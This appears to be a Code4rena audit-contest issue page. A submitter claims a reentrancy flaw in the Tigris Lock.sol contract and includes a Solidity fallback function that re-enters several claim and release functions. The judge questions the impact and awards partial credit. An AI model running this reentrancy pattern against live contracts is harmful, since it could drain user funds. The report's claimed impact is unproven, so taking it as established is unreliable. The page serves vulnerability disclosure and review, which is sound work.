search

code-423n4 / 2022-12-tigris-findings

8 stars 4 forks source link

SWC-107 Rentrancy using fallback CWE-841 Improper Enforcement of Behavioral Workflow #186

Closed code423n4 closed 1 year ago

code423n4 commented 1 year ago

Lines of code

https://github.com/gbadebosmith/ouch/blob/cc358abb52477d517d9c788942bd0acc9f6c6bf0/AttackLock.sol#L149-L161

Vulnerability details

Impact

Rentrancy using fallback to call functions called claim, calimDebt, release, claimGovFee, and editAsset from attack file.

Proof of Concept

sourcecode: https://github.com/code-423n4/2022-12-tigris/blob/main/contracts/Lock.sol attack sourcecode: https://github.com/gbadebosmith/ouch/blob/main/AttackLock.sol 

fallback() external payable {
    if (address(locki).balance >= 1 ether) {
        locki.claim(1234567890);
        locki.claimDebt(0xc59dFC955c26493c3E5Ac068A308CB787CCE34e6);
        //locki.lock(_asset, _amount, _period);
        //locki.extendLock(_id, _amount, _period);
        locki.release(1234567890);
        locki.claimGovFees();
        locki.editAsset(0xc59dFC955c26493c3E5Ac068A308CB787CCE34e6, true);
        //locki.sendNFTs(0x0011111111111111111111111111);
    }
}

Tools Used

Remix IDE

Recommended Mitigation Steps

GalloDaSballo commented 1 year ago

Same as the other submission, missing impact, unclear if there's any economic value to be extracted from the reEntrancy

GalloDaSballo commented 1 year ago

Not happy with submission quality, will award 50%

I think you got the chops to code, you have to improve your report quality though

c4-judge commented 1 year ago

GalloDaSballo marked the issue as duplicate of #400

c4-judge commented 1 year ago

GalloDaSballo marked the issue as partial-50